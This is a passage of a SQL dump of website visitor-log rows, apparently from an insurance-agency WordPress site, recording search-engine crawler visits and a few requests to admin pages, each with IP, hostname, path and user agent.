http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(6750,'0b_bd86ef7871feb5bc860cb5dc5907fba5','1458400493','69.30.221.250','latestdirect.com','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(6753,'0b_bd86ef7871feb5bc860cb5dc5907fba5','1458400496','69.30.221.250','latestdirect.com','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(6756,'0b_c75fc8f34ae48f9445f05fc18571a08c','1458403438','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1','','',0,'MacOSX','Chrome 21','','','','','','','','0','0',0),(6758,'0b_69abeaa660a803a6d6e83cc9f25b213f','1458404401','180.76.15.135','baiduspider-180-76-15-135.crawl.baidu.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(6759,'0b_087e42e8c1463eb92d533748941e9a0e','1458406059','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(6761,'0b_087e42e8c1463eb92d533748941e9a0e','1458406071','69.30.213.82','69.30.213.82','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6764,'0b_d3f631a8f0c331a3982574cfba7d7444','1458407461','66.249.73.169','crawl-66-249-73-169.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6767,'0b_a5a7336821de17c6cf1faa3933940d07','1458409400','66.249.73.187','crawl-66-249-73-187.googlebot.com','/forms/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6770,'0b_1ab328597cea5e9053fb36f7f3b17390','1458409400','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6771,'0b_8b92e79a5201025a65abbac295bb9893','1458413048','45.35.92.160','unassigned.psychz.net','/igo/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','','','','','','','0','0',0),(6774,'0b_4a0f8d803642d96362a1008c5de4824a','1458413648','66.249.73.194','crawl-66-249-73-194.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(6777,'0b_22f0e2922a1dcc74903b1cd6f06ce219','1458413938','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6779,'0b_252c187d0c044a2ae9f0890bb6a6ced7','1458414308','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(6780,'0b_4b208abd21c8ebbe887b86c2ad5ab9b3','1458414812','178.255.215.70','crawl06.exabot.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(6782,'0b_a14551928bf9802a652e9e23f63c8a9a','1458414916','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6783,'0b_82a7e5b8ed176bd388a1f1b46c77e379','1458416364','178.255.215.70','crawl06.exabot.com','/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(6785,'0b_82a7e5b8ed176bd388a1f1b46c77e379','1458416366','178.255.215.70','crawl06.exabot.com','/comments/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(6788,'0b_82a7e5b8ed176bd388a1f1b46c77e379','1458416368','178.255.215.70','crawl06.exabot.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(6789,'0b_82a7e5b8ed176bd388a1f1b46c77e379','1458416371','178.255.215.70','crawl06.exabot.com','/?p=288','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(6791,'0b_92f82a2b4ae5b2cf6e19062f4177f112','1458418585','107.170.68.76','107.170.68.76','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(6794,'0b_92f82a2b4ae5b2cf6e19062f4177f112','1458418598','107.170.68.76','107.170.68.76','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6795,'0b_92f82a2b4ae5b2cf6e19062f4177f112','1458418612','107.170.68.76','107.170.68.76','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6797,'0b_92f82a2b4ae5b2cf6e19062f4177f112','1458418625','107.170.68.76','107.170.68.76','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6800,'0b_92f82a2b4ae5b2cf6e19062f4177f112','1458418637','107.170.68.76','107.170.68.76','/SSO/235_39.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6803,'0b_92f82a2b4ae5b2cf6e19062f4177f112','1458418662','107.170.68.76','107.170.68.76','/SSO/235_42.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6804,'0b_92f82a2b4ae5b2cf6e19062f4177f112','1458418690','107.170.68.76','107.170.68.76','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6806,'0b_92f82a2b4ae5b2cf6e19062f4177f112','1458418719','107.170.68.76','107.170.68.76','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6807,'0b_92f82a2b4ae5b2cf6e19062f4177f112','1458418742','107.170.68.76','107.170.68.76','/products.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6809,'0b_92f82a2b4ae5b2cf6e19062f4177f112','1458418768','107.170.68.76','107.170.68.76','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6812,'0b_92f82a2b4ae5b2cf6e19062f4177f112','1458418779','107.170.68.76','107.170.68.76','/SSO/235_39.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6813,'0b_92f82a2b4ae5b2cf6e19062f4177f112','1458418791','107.170.68.76','107.170.68.76','/SSO/235_42.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6815,'0b_cfd4e5c23947873c085984eab16b5e74','1458421054','207.46.13.149','msnbot-207-46-13-149.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6818,'0b_809ef1d534c6ef3cebda29bc807ef6f2','1458421381','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6819,'0b_4b19f869d0a02cb9950e6365a8c322ef','1458424079','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6821,'0b_9801002638fa7f631f0e58d21e5b7da2','1458428654','94.242.239.162','ip-static-94-242-239-162.server.lu','/wp-admin/theme-install.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','lu','','','','','','','3','0',0),(6824,'0b_9801002638fa7f631f0e58d21e5b7da2','1458428657','94.242.239.162','ip-static-94-242-239-162.server.lu','/wp-admin/theme-install.php?tab=upload','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','lu','','','','','','','3','0',0),(6827,'0b_e9da3d00b4ef287c8c8669d7e2e5ce78','1458430097','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6828,'0b_46b4acb322c409ec87c23a5e12c899ee','1458432485','68.180.229.164','b115306.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(6831,'0b_46b4acb322c409ec87c23a5e12c899ee','1458432486','68.180.229.164','b115306.yse.yahoo.net','/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(6834,'0b_ca9daad85dcdb173e0e8b860db41f59f','1458432487','68.180.229.91','b115355.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(6837,'0b_89fdaf442d2524568825ac7c35510e73','1458432686','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6839,'0b_89fdaf442d2524568825ac7c35510e73','1458432997','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6842,'0b_d91c833196f49d5c4b681fefcc66f126','1458435519','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(6845,'0b_d91c833196f49d5c4b681fefcc66f126','1458435531','69.30.213.82','69.30.213.82','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6846,'0b_678a6c0d36caf0cc758ef57d8faf1f56','1458436058','157.55.39.82','msnbot-157-55-39-82.search.msn.com','/carriers','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6849,'0b_678a6c0d36caf0cc758ef57d8faf1f56','1458436121','157.55.39.82','msnbot-157-55-39-82.search.msn.com','/carriers/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6852,'0b_678a6c0d36caf0cc758ef57d8faf1f56','1458436231','157.55.39.82','msnbot-157-55-39-82.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6854,'0b_0ad74278c20a95bdee3bf8fc7dfc3d58','1458437294','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6857,'0b_5691f834bd69852308f228e62d129167','1458437711','69.30.234.186','69.30.234.186','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(6860,'0b_5691f834bd69852308f228e62d129167','1458437723','69.30.234.186','69.30.234.186','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6863,'0b_5691f834bd69852308f228e62d129167','1458437733','69.30.234.186','69.30.234.186','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6864,'0b_5691f834bd69852308f228e62d129167','1458437748','69.30.234.186','69.30.234.186','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6866,'0b_5691f834bd69852308f228e62d129167','1458437761','69.30.234.186','69.30.234.186','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6867,'0b_fc6040648461e386869fbb3b6170f240','1458439253','157.55.39.82','msnbot-157-55-39-82.search.msn.com','/carriers/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6869,'0b_2e0bc2a0c10ed739edb617b2b6660c53','1458439677','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6870,'0b_b32f56b3647041660cb58bb194dadc14','1458444299','157.55.39.82','msnbot-157-55-39-82.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6872,'0b_6e261f89478142b6a4bb352340470c12','1458444363','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(6873,'0b_281ddb2bc6caf02e6ae0764f17eb69f6','1458445741','89.248.172.110','no-reverse-dns-configured.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6876,'0b_70178280d359cbdbe1ebeeded0516c01','1458448085','66.249.83.213,108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/quotes.htm','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(6879,'0b_5d38b6c8a15e2d440a176f7d0ab8bbe5','1458448132','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/about-us','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6882,'0b_5d38b6c8a15e2d440a176f7d0ab8bbe5','1458448149','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6884,'0b_9a827bbab57daf1410b6d30600406b4c','1458451068','66.249.73.169','crawl-66-249-73-169.googlebot.com','/members/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(6885,'0b_e8ff62d58d9161242833da51cba96246','1458452853','180.76.15.18','baiduspider-180-76-15-18.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(6887,'0b_ddc41f14f8fa034b87f252719cede271','1458458038','157.55.39.82','msnbot-157-55-39-82.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6890,'0b_50647ce7f589232a74121cdbd6de3912','1458459228','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6891,'0b_e54b95b40277a523170470ceb035f0df','1458459302','40.77.167.73','msnbot-40-77-167-73.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6893,'0b_e7002af458b0ff444268abfa99f84238','1458459328','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(6894,'0b_cd6ed6bcf43704a6ea4d594e426ff3dd','1458460254','94.242.239.162','ip-static-94-242-239-162.server.lu','/wp-admin/theme-install.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','lu','','','','','','','3','0',0),(6897,'0b_cd6ed6bcf43704a6ea4d594e426ff3dd','1458460257','94.242.239.162','ip-static-94-242-239-162.server.lu','/wp-admin/theme-install.php?tab=upload','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','lu','','','','','','','3','0',0),(6899,'0b_91c75f8d4739ee371da2e085125737aa','1458461559','180.76.15.149','baiduspider-180-76-15-149.crawl.baidu.com','/feed/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(6900,'0b_543a8cdcfa4a7bc15cd36c80beccdf26','1458461854','66.249.73.202','crawl-66-249-73-202.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6902,'0b_525944de0834780a2663ca28d183ad2d','1458461861','66.249.73.189','crawl-66-249-73-189.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6903,'0b_525944de0834780a2663ca28d183ad2d','1458462083','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6905,'0b_a2bd6eb6fee9de08960047559e64fb08','1458462177','46.118.155.216','sol-fttb.216.155.118.46.sovam.net.ua','/robots.txt','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','Unknown Spider','','','','3','0',0),(6906,'0b_a2bd6eb6fee9de08960047559e64fb08','1458462181','46.118.155.216','sol-fttb.216.155.118.46.sovam.net.ua','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','Unknown Spider','','','','3','0',0),(6908,'0b_a2bd6eb6fee9de08960047559e64fb08','1458462205','46.118.155.216','sol-fttb.216.155.118.46.sovam.net.ua','/','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','','','','','3','0',0),(6911,'0b_2c2ded7e6ccc83fe98075aa5dc0ece2a','1458463925','66.249.73.169','crawl-66-249-73-169.googlebot.com','[404] /pdf/avoid_1099.pdf','Googlebot/2.1 (+http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6914,'0b_1e7c8fa3b894680c701105d707b3a59e','1458465744','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6915,'0b_19aa4d89c5751ba405dd8a35f8fb86cb','1458466083','94.23.40.23','crawl15.lp.007ac9.net','/robots.txt','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6917,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466085','94.23.40.23','crawl15.lp.007ac9.net','/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6918,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466088','94.23.40.23','crawl15.lp.007ac9.net','/agent-tools/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6921,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466091','94.23.40.23','crawl15.lp.007ac9.net','/register/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6923,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466093','94.23.40.23','crawl15.lp.007ac9.net','/about-us/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6926,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466096','94.23.40.23','crawl15.lp.007ac9.net','/insentives/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6929,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466099','94.23.40.23','crawl15.lp.007ac9.net','/licensing-contracting/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6932,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466101','94.23.40.23','crawl15.lp.007ac9.net','/carriers/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6935,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466104','94.23.40.23','crawl15.lp.007ac9.net','/contact/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6936,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466107','94.23.40.23','crawl15.lp.007ac9.net','/case-status/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6939,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466110','94.23.40.23','crawl15.lp.007ac9.net','/forms/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6942,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466115','94.23.40.23','crawl15.lp.007ac9.net','/igo/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6945,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466118','94.23.40.23','crawl15.lp.007ac9.net','/term-quotes/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6947,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466121','94.23.40.23','crawl15.lp.007ac9.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6948,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466123','94.23.40.23','crawl15.lp.007ac9.net','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6951,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466126','94.23.40.23','crawl15.lp.007ac9.net','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 